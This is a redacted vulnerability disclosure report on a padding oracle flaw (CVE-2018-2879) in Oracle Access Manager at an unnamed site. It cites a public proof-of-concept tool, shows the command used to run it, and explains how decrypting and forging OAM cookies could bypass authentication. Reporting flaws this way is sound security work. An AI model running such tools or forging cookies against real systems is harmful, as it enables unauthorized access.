[HTAF4-213] [Pre-submission] CVE-2018-2879 (padding oracle attack in the Oracle Access Manager) at https://█████████

##Description We were able to identify CVE-2018-2879 in Oracle Access Manager, used on the https://██████ Link to the CVE: https://nvd.nist.gov/vuln/detail/CVE-2018-2879 This vulnerability is rated critical, and may allow unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. It's possible to conduct padding oracle attack and recover plaintext from `encquery` parameter Materials: https://sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/ ##POC We modified https://github.com/redtimmy/OAMBuster/blob/master/oambuster.py proof-of concept for https://█████ (it required some changes, for example `gcds-consent=true` is necessary in all requests to not face with consent banner page. Here is it: █████████ It can be launched in the next way to simply test for padding oracle and recover plaintext: ``` oambuster.py -d https://██████████ ``` The result (decrypt process can take some time, for example on the screenshot above it's not fully finished, but you can already see readable parts): ███████ This confirms that vulnerability is valid. ##Suggested fix Apply patch & update OAM instance ## Impact Padding oracle attack allows us to decrypt any messages. As all the encrypted messages (encquery, encreply, OAMAuthnCookie) are encrypted with the same key, we can decrypt any of these messages. This attack can also be used to encrypt messages. So if we construct a valid authentication cookie and encrypt it with our padding oracle attack, we can pass it off as valid to the web server and perform authentication bypass. We will research this further and will update report with new information.